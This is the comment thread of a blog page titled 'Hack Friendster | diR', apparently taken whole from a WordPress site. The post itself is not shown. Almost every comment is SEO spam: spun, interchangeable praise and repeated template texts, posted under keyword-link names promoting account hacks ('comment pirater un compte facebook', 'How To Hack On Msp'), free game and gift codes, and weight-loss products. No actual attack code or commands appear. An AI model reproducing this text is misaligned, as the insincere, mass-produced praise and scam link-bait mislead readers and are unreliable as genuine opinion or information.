
30 07 2013
bep nuong dien

Bob Alexander is well experienced in outdoor cooking.
If you are not in the habit of giving your grill a good clean before you
put it away, you probably know that it will be housing some
spiders and their prey by the time your are ready to bring it out for the first barbeque.
Its easy to maintain, easy to clean, easy to operate and aside from that it gives a whole lot
more of benefits to your health by means of its cooking technology.

3 08 2013
Nichol

Hi there! Do you know if they make any plugins to assist
with SEO? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good
gains. If you know of any please share. Thank you!

4 08 2013
fernsehsessel leder

Wow! In the end I got a weblog from where I be capable of actually obtain valuable facts concerning my study and knowledge.

6 08 2013
lose thigh fat without building muscle

It’s really a nice and helpful piece of information. I am glad that you just shared this helpful info with us. Please stay us informed like this. Thanks for sharing.

14 09 2013
網頁設計公司

Currently it sounds like WordPress is the top blogging platform
out there right now. (from what I’ve read) Is that what
you are using on your blog?

16 09 2013
Lowell

Woah! I’m really digging the template/theme of this website.
It’s simple, yet effective. A lot of times it’s tough to get that “perfect balance” between user
friendliness and visual appearance. I must say that you’ve done a fantastic
job with this. In addition, the blog loads super fast for me on Safari.
Excellent Blog!

16 09 2013
vakantiehuis Duitsland

There’s certainly a great deal to find out about
this topic. I love all of the points you made.

18 09 2013
Free psn codes no offers

Appreciating the persistence you put into your website and in
depth information you provide. It’s good to come across a blog every once in a while that isn’t the same
outdated rehashed material. Excellent read! I’ve saved your site and I’m including your RSS
feeds to my Google account.

21 09 2013
frontline commando d-day cheats ipad

s always changing and shifting, and new things are added all the
time. Don’t just write off video games because you think they’re
all blood and gore. Still no word on how the hell you get past level 65.

3 10 2013
Www.Dailymotion.Com

Do you mind if I quote a few of your posts as long as
I provide credit and sources back to your blog?
My blog is in the exact same niche as yours and my users would definitely benefit from a lot of the information you present here.
Please let me know if this alright with you. Thank you!

18 10 2013
revtest

I simply could not depart your site before suggesting that I actually loved the standard info an individul
supply for your visitors? Is going to be back steadily in
order to check out new posts

6 11 2013
EndoRev

you are in reality a good webmaster. The site loading velocity is incredible.
It seems that you are doing any distinctive trick. Also, The contents aree masterpiece.
you’ve done a magnificent task on this topic!

1 03 2014
Www.reddit.com

I am sure this post has touched all the internet users, its really
really pleasant post on building up new website.

6 03 2014
how to uninstall google chrome

Definitely imagine that which you said. Your favourite reason seemed to be on the
internet the simplest factor to take into account of.
I say to you, I definitely get irked even as other folks consider concerns that they plainly don’t know about.
You managed to hit the nail upon the highest as neatly
as outlined out the entire thing with no need side-effects ,
people could take a signal. Will likely be again to get more.
Thanks

7 03 2014
download youtube videos free

We stumbled over here from a different web address and thought I
might check things out. I like what I see so now i’m following you.
Look forward to exploring your web page yet again.

8 03 2014
how to change profile picture on facebook

Hello! I’ve been following your blog for some time now and
finally got the bravery to go ahead and give you a shout out from Austin
Texas! Just wanted to tell you keep up the great work!

9 03 2014
unzip files

Wow! This blog looks exactly like my old one!

It’s on a totally different topic but it has pretty much
the same page layout and design. Superb choice of colors!

10 03 2014
how to get a free minecraft account

You really make it appear really easy with your presentation
but I to find this matter to be really something which I feel
I’d by no means understand. It sort of feels too complicated and very large for me.
I am having a look ahead in your subsequent post, I will attempt to get the hang of it!

12 03 2014
flappy bird download

Right now it seems like Movable Type is the top blogging platform available
right now. (from what I’ve read) Is that what you are using on your blog?

12 03 2014
identifiant free wifi gratuit

I do not even understand how I ended up here, but I believed
this post used to be great. I do not realize who you’re but certainly you are going to a famous
blogger for those who aren’t already. Cheers!

12 03 2014
How To Hack On Msp

hello!,I really like your writing very much! percentage we communicate extra about your post on AOL?
I require an expert in this house to solve my problem.

May be that is you! Having a look forward to look you.

12 03 2014
create a facebook page

Thanks for your marvelous posting! I truly enjoyed reading it, you are
a great author.I will ensure that I bookmark your blog and may come
back at some point. I want to encourage you to continue your great job,
have a nice holiday weekend!

13 03 2014
How to get your ex back

Nice answer back in return of this issue with solid arguments and
describing the whole thing regarding that.

13 03 2014
Pure Green Coffee Bean

Yes! Finally something about weight loss smoothies.

13 03 2014
paid surveys

You really make it seem so easy with your presentation but
I in finding this topic to be really something that I feel I’d never understand.
It sort of feels too complicated and very extensive for me.
I am looking ahead in your subsequent submit, I’ll try
to get the grasp of it!

14 03 2014
dj software

Hmm is anyone else having problems with the
images on this blog loading? I’m trying to find out if its a
problem on my end or if it’s the blog. Any feedback would be greatly
appreciated.

15 03 2014
Holley

Wow! In the end I got a blog from where I know how to actually obtain helpful facts
regarding my study and knowledge.

15 03 2014
identifiant free wifi

This is a very good tip particularly to those fresh to the blogosphere.
Simple but very precise information… Thank
you for sharing this one. A must read post!

17 03 2014
comment pirater un compte facebook

Hi! I’ve been following your web site for a long time now and finally got the courage
to go ahead and give you a shout out from Houston Texas!
Just wanted to tell you keep up the good job!

18 03 2014
Chadwick

Ridiculous quest there. What occurred after?

Take care!

21 03 2014
腰酸背痛

Do you have a spam issue on this site; I also am a blogger,
and I was wanting to know your situation; we have created some nice procedures and we are looking to trade methods
with other folks, why not shoot me an e-mail if interested.

21 03 2014
rf chamber

Write more, thats all I have to say. Literally, it seems as though you relied on the video to make your point.
You clearly know what youre talking about, why throw away your intelligence on just posting videos to your weblog when you could be giving us something enlightening to read?

23 03 2014
Elsword Hack

I am genuinely delighted to read this webpage posts which includes lots of useful facts, thanks for providing such data.

25 03 2014
bni

What’s up to every body, it’s my first pay a visit
of this website; this blog contains amazing and in fact fine stuff in support of
readers.

26 03 2014
會計師

You need to be a part of a contest for one of the best
blogs online. I most certainly will recommend this web site!

26 09 2014
steam wallet codes

steam wallet codes

Hack Friendster | diR

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s




%d bloggers like this: